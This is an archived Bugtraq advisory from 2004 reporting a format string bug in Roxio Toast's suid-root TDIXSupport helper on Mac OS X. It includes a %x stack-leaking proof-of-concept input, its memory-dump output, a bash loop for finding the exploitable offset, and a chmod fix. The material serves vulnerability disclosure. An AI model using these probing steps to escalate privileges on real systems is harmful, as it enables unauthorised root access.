Home page logo
/

bugtraq logo Bugtraq mailing list archives

Possible local root vulnerability in Roxio Toast on Mac OS X
From: fintler <fintler () gmail com>
Date: Tue, 14 Dec 2004 01:40:17 -0500

Possible local root vulnerability in Roxio Toast on Mac OS X
By fintler <fintler () gmail com>

Summary:

There is a format string bug in the binary (/Library/Application
Support/Roxio/TDIXSupport). It is installed suid root by default and
may be exploited by finding the offset and overwriting the stack with
malicious instructions.

Example:
fintler () haven:/Library/Application Support/Roxio$ ls -l TDIXSupport 
-rwsr-sr-x  1 root  wheel  14260  5 Nov  2003 TDIXSupport
fintler () haven:/Library/Application Support/Roxio$ ./TDIXSupport
"AAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
kextload: /Library/Application
Support/Roxio/AAAAAAAAAAAAAAA905d2ce23a206e6f20737563682062756e646c652066696c652065789058a58c61e0403b4300090000ef0bfffee90bffff44064b26064b26064b2d061e2503032b09058a52cbfffef10440222229058a5f01100061e250fefefeff1173004a0ffffffff61e0409058e868bfffef10440282449058ea9c90197d3801696246a064b2d02314664b06061e040a00011ac3a000003032b09057df58bfffef303007a0103009f0bffff44064b2603032b03009f0030118090597b38bfffef802402824290597bc09058f61cbfffef80304b903032b09058f61cbfffef80090580a2416904017a01900e064b2d040300e60300e60016964b26000304b903032b09058f61cbffff000240222249058f74c0030083000bffff00048022422901b7ab4304b908ffffffff300e60624270a0193140a01900e062427090197d38bffff0502802244803009f003008003008101013008303032b0bffff48024022224474c00301520bffff2e00300d903817a01900e011805300a0192e946242702f4c6962726172792f4170706c69636174696f6e20537570706f72742f526f78696f2f4141414141:
no such bundle file exists
can't add kernel extension /Library/Application
Support/Roxio/AAAAAAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
(file access/permissions) (run kextload on this kext with -t for
diagnostic output)
fintler () haven:/Library/Application Support/Roxio$
for((i=1;i<1000;i++));do echo -n "$i "&&./TDIXSupport
"AAAAAAAAAAAAAAAAAAAAAAA%$i\$x";done|grep 4141 2>/dev/null
etc...

Solution:
A possible way of fixing this issue is to change the permissions of
the binary to non-suid root by issuing the following command:
'sudo chmod 0755 /Library/Application Support/Roxio/TDIXSupport'
This will most likely disable some functionality of Toast.

EOF


  By Date           By Thread  

Current thread:
  • Possible local root vulnerability in Roxio Toast on Mac OS X fintler (Dec 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]